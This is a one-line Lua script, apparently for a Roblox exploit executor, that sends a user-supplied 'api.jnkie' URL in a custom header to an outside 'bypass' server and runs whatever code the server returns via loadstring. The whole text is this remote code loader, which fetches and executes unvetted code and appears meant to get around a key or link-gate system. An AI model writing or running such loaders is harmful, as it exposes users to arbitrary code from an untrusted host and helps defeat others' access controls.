local target = "" -- api.jnkie url here (https://...) local function byp() local req = syn and syn.request or request or http_request local resp = req({Url="https://ace.weskid.xyz/bypass",Method="GET",Headers = {["Skid-X"]=target}}) return resp.Body end;loadstring(byp())()